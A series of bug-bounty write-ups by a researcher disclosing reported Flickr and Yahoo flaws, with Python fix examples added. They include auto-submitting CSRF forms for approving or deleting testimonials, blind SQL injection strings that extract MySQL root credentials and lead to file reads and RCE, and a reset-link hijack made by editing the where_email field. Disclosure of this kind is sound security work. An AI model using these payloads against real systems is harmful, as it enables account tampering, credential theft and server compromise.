Write whatever you want in other users' Flickr profiles


Hello. Did you hear about the testimonials feature in Flickr? Hmm, maybe 🙂

Overview:

Simply put, the testimonials function gives you the ability to write testimonials/comments about a Flickr user; that user then either approves them for display on his profile page or deletes them (in case he didn't like them ^_^).

What we have here:

We have a CSRF vulnerability in the testimonials Approve/Delete actions. The impact: an attacker can use the CSRF to approve and delete users' testimonials, because this request lacks the "magic_cookie" token that protects against CSRF elsewhere in Flickr.

POC/Steps:

1. Write a testimonial for any account from "https://www.flickr.com/testimonials_write.gne?id=[UserID]" (replace [UserID] in the link with the victim's id).

2. The victim must approve the testimonial before it is displayed on his profile page. The following CSRF payload performs that action (change the testimonial id):

<html>
<body onload="D1.submit();">
<form id="D1" action="https://www.flickr.com/testimonials_manage.gne" method="POST">
<input type="hidden" name="approve_72157648695059941" value="APPROVE" />
</form>
</body>
</html>

3. Send the payload to the victim. When he opens it, check his profile page: you will find what you wrote in step 1.

4. To delete a testimonial, the following CSRF payload does it (change the testimonial id):

<html>
<body onload="D1.submit();">
<form id="D1" action="https://www.flickr.com/testimonials_manage.gne" method="POST">
<input type="hidden" name="delete_72157648695059941" value="DELETE" />
</form>
</body>
</html>
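The fix for both payloads above is the same: the approve/delete handler must require the session-bound anti-CSRF token (the "magic_cookie" the post mentions) that a page on another origin cannot read. The following handler is an added example written for this post, not Flickr's code; the session store, the header names and the token name are assumptions.

```python
import hmac
import secrets
from urllib.parse import parse_qs, urlparse

# Constructed stand-in for the per-session anti-CSRF token the post calls "magic_cookie".
SESSION_TOKENS = {"sess-123": secrets.token_hex(16)}  # session id -> token

def parse_action(form_body):
    """Return ("approve"|"delete", testimonial_id) from a posted form, or None."""
    for name in parse_qs(form_body, keep_blank_values=True):
        for verb in ("approve", "delete"):
            prefix = verb + "_"
            if name.startswith(prefix) and name[len(prefix):].isdigit():
                return verb, name[len(prefix):]
    return None

def manage_testimonial(session_id, headers, form_body):
    """Hardened handler for testimonials_manage.gne: returns (status, detail)."""
    expected = SESSION_TOKENS.get(session_id)
    if expected is None:
        return 401, "no session"
    # Defence in depth: when the browser sends Origin/Referer it must be our own host.
    origin = headers.get("Origin") or headers.get("Referer", "")
    if origin and urlparse(origin).netloc != "www.flickr.com":
        return 403, "cross-site origin"
    # Primary check: the form must carry the session-bound token. The forged page in
    # the post posts only approve_<id>=APPROVE, so it fails here.
    supplied = parse_qs(form_body, keep_blank_values=True).get("magic_cookie", [""])[0]
    if not hmac.compare_digest(supplied, expected):
        return 403, "missing or bad magic_cookie"
    action = parse_action(form_body)
    if action is None:
        return 400, "no approve_/delete_ field"
    return 200, f"{action[0]} {action[1]}"
```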


POC Video

Thanks,
Mohamed Maati
@MSM_1st
www.sculptordev.com

2nd BSQLI to RCE in Flickr Exploited by Sculptor Application


The following vulnerability is my second BSQLI => RCE in Flickr.

After discovering a BSQLI in Flickr, I realised that working by hand would take a long time to extract a good proof of concept (root (DBA) password, tables, etc.). So I decided to add a new feature to the Sculptor application [www.sculptordev.com]: cookie/session support, which allows exploiting SQLi in sites that require login/sessions.

So I wrote the code to support cookies/sessions, and the time it took was less than a manual exploit.


To download the new release of Sculptor (V1.1) and for more information: www.sculptordev.com


Here is the proof of concept video

Thanks,
Mohamed Maati
@MSM_1st
www.sculptordev.com

Great Update BSQLI Escalated to RCE in FLICKR

Today I talk about the best exploit for a SQL injection vulnerability which I found in Flickr. By the way, there is another one ^_^.

Overview:

The impact analysis for this BSQLI is:
– Select from databases.
– Update and delete tables.
– Get the dba (root) password.
– Read and write files.
– Escalate to RCE.

Flickr gives you the ability to create a book; after you create a new book you can add a "Front Cover Photo". You can perform the following actions on the cover photo:
– Change size
– Change position
– Zoom in, zoom out
– Crop photo

All of the above parameters were affected by blind SQL injection.

Let's start:

1. Create a new photo book, then edit it:

http://www.flickr.com/create/books/107355593/cover

2. Change the cover photo position, zoom in and zoom out (just change the photo settings) and capture the request.

3. A POST request is sent to "http://api.flickr.com/services/rest" with the following data:

page_id=107355603_1&position=1&photo_id=13137498255&crop_x=12&crop_y=0&crop_w=76&crop_h=52

4. Here is my analysis of what happens in the code for the above. First, there is an UPDATE query (DML) used to update the photo settings (crop, zoom in and zoom out). I assumed that the query is:

UPDATE TblPhotosSettings SET position='1', crop_x='12', crop_y='0', crop_w='76', crop_h='52' WHERE page_id='107355603_1' and photo_id=13137498255

5. After playing with the request I didn't find any change in the response. Maybe no SQLi here? But I decided to have another look. I said: this is an UPDATE query (DML), maybe the response doesn't change; let's check the cover photo page "http://www.flickr.com/create/books/107355593/cover".

6. I found that the image position changed according to what I wrote before. What should I do now!?

7. I depended on the y location (crop_y) to know whether the payload was true or false.

  The following query returns true:

page_id=107355603_1&position=1&photo_id=13137498255&crop_x=12&crop_y=0&crop_w=76&crop_h=52',crop_y=CASE WHEN 1=1 THEN '0' ELSE '50' END,crop_w='76

  The following query returns false:

page_id=107355603_1&position=1&photo_id=13137498255&crop_x=12&crop_y=0&crop_w=76&crop_h=52',crop_y=CASE WHEN 1=0 THEN '0' ELSE '50' END,crop_w='76

If the image "y" location changes to 0 then the query returned "true"; otherwise the image "y" location changes to 50, which means the query returned false.


Wow, I got an idea: indicate true and false by using a special image 🙂

8. I used the following image to tell whether the query returned true or false, and to make the injection easy for me:

[Image: photo 13137498255, used as the true/false indicator]

9. Now I knew that I had a real SQLi. So what must I do now? Let's give Yahoo! a proof of concept:

   To get the length of the database name:

page_id=107355603_1&position=1&photo_id=13137498255&crop_x=12&crop_y=1&crop_w=76&crop_h=52',crop_y=CASE WHEN (SELECT length(database())) BETWEEN 12 and 17 THEN '0' ELSE '50' END,crop_w='76

10. After that, what's next to escalate your SQLi and give yourself more privileges!!!?
    Yes, you are right: let's check whether the MySQL user is dba (root) or not.

page_id=107355603_1&position=1&photo_id=13137498255&crop_x=12&crop_y=1&crop_w=76&crop_h=52',crop_y=CASE WHEN (SELECT length((SELECT username FROM mysql.user limit 0,1))) > 0 THEN '0' ELSE '50' END,crop_w='76

   Then get the password of the root user:

page_id=107355603_1&position=1&photo_id=13137498255&crop_x=12&crop_y=1&crop_w=76&crop_h=52',crop_y=CASE WHEN ASCII(SUBSTRING((SELECT password FROM mysql.user limit 0,1),1,1)) > 60 THEN '0' ELSE '50' END,crop_w='76

11. Now, using the above methodology, you can do whatever you need. I started by reading /etc/passwd, then writing files on the server. I had full access to the server now 🙂

12. I escalated the BSQLI to RCE. I gave Yahoo! the number of databases and tables I had access to, the root (dba) username and password, 3 lines of /etc/passwd, and files created in the temp folder as a POC.
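Why the crop_h payload from step 7 flips crop_y, and why parameter binding stops it, can be shown against the UPDATE the post assumes in step 4. The following is an added example written for this post, not Flickr's code: it uses an in-memory SQLite table (a constructed stand-in for the MySQL backend) with the post's column names and values.

```python
import sqlite3

# Payloads quoted from the post (step 7); crop_h is the injection point.
PAYLOAD_TRUE = "52',crop_y=CASE WHEN 1=1 THEN '0' ELSE '50' END,crop_w='76"
PAYLOAD_FALSE = "52',crop_y=CASE WHEN 1=0 THEN '0' ELSE '50' END,crop_w='76"

def make_db():
    """Constructed table mirroring the schema the post assumes in step 4."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE TblPhotosSettings (page_id TEXT, photo_id INTEGER, "
                 "position TEXT, crop_x TEXT, crop_y TEXT, crop_w TEXT, crop_h TEXT)")
    conn.execute("INSERT INTO TblPhotosSettings VALUES "
                 "('107355603_1', 13137498255, '1', '12', '1', '76', '52')")
    return conn

def stored_crop(conn):
    """(crop_y, crop_h) currently stored for the book page."""
    return conn.execute("SELECT crop_y, crop_h FROM TblPhotosSettings "
                        "WHERE page_id='107355603_1'").fetchone()

def update_vulnerable(conn, crop_h):
    """String-built UPDATE, as the post assumes the backend does it."""
    sql = ("UPDATE TblPhotosSettings SET position='1', crop_x='12', crop_y='1', "
           "crop_w='76', crop_h='" + crop_h + "' "
           "WHERE page_id='107355603_1' AND photo_id=13137498255")
    conn.execute(sql)
    # With the payload the SET list gains a second crop_y= assignment; the rightmost
    # one wins, so the CASE expression decides the y position the page later shows.
    return stored_crop(conn)[0]

def update_safe(conn, crop_h):
    """Bind the value instead of splicing it: it travels as data, never as SQL text."""
    conn.execute("UPDATE TblPhotosSettings SET crop_h=? WHERE page_id=? AND photo_id=?",
                 (crop_h, "107355603_1", 13137498255))
    # crop_y is untouched; crop_h now holds the payload as an inert string.
    return stored_crop(conn)
```

Rejecting anything that is not a small integer before the query (for example with int()) is the second layer a reviewer would ask for, since crop_h is never legitimately SQL text.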

That was an amazing SQLi exploit, escalated to RCE, in Flickr. After that I was shocked when the Yahoo! committee decided on the minimum bounty ($3000) for a SQLi that I have ever seen, and the reason was that this is the new process. I just need to add that I reported the vulnerability 3 months ago, before the new process ^_^. By the way, thanks Yahoo! BB team, but it deserves at least 3x the current amount.

Note: Yahoo! paid $10000 for a BSQLI to another guy and $15000 for a SQLi to another guy too. But this one, which is a BSQLI like the first one, got $3000 only (I need to know the logic behind that).



Here is the proof of concept video

Thanks,
Mohamed Maati
@MSM_1st
www.sculptordev.com

How I could reset users' passwords on a Yahoo! subdomain


And here is my first post, about how I reset users' passwords on a Yahoo! subdomain.
http://arabeye.yahoo.com
is the Yahoo! Maktoob Research Community.
I decided to have a look at the Forgot Password functionality and see how it works on this site.

– First, you must enter a valid email address to verify yourself. The site checks whether the email exists in the database: if yes, it gives you an option to send an email; if the email doesn't exist it tells you "Invalid Email" (by the way, this is user enumeration/user harvesting).

Yahoo! ArabEye gives you 2 methods to reset your password:
1. Send a reset link directly to my e-mail
2. Answer the two security questions

I started with the second method, "Answer the two security questions", but I failed to bypass it 🙁


So, back to the first method, "Send reset link directly to my e-mail". After checking the form and the POST data I found a hidden field named "where_email", and this field contains the user email which I entered in the previous step ^_^. I told myself: is this right (the developer saves the email in a hidden field and then sends the reset password link to this email)? :O That's true.


So what should I do now!? You are right, man ^_^ ... just edit the request and change the victim's email address to the attacker's email address in the "where_email" parameter.
After 2 minutes I found the reset password link in the attacker's email inbox. My feeling was like (Edeloo Edy).
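The root cause is that the recipient of the reset link was taken from a client-controlled hidden field. The fix is to keep the verified address on the server, keyed by an opaque request id, and ignore any email the second request carries. The following is an added example written for this post, not the ArabEye site's code; the user store, the outbox and the field name reset_id are constructed assumptions, and where_email is the field name from the post.

```python
import secrets

# Constructed user store standing in for the site's database.
USERS = {"alice@example.com": {"id": 1}}
# Server-side pending resets: opaque request id -> verified email.
PENDING = {}
# Constructed outbox: (recipient, link) pairs the site would have e-mailed.
SENT = []

def start_reset(email):
    """Step 1: verify the address server-side and remember it under a random request id."""
    if email not in USERS:
        return None  # the real flow should answer identically to avoid user enumeration
    rid = secrets.token_urlsafe(16)
    PENDING[rid] = email
    return rid

def send_reset_vulnerable(form):
    """The ArabEye pattern: trusts the hidden where_email field sent by the client."""
    recipient = form["where_email"]
    SENT.append((recipient, "https://example.test/reset?token=" + secrets.token_urlsafe(8)))
    return recipient

def send_reset_fixed(form):
    """Resolve the recipient from server state; any client-supplied email is ignored."""
    email = PENDING.pop(form.get("reset_id", ""), None)  # single use
    if email is None:
        return None
    SENT.append((email, "https://example.test/reset?token=" + secrets.token_urlsafe(8)))
    return email
```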



Here is the proof of concept video

Thanks,
Mohamed Maati
@MSM_1st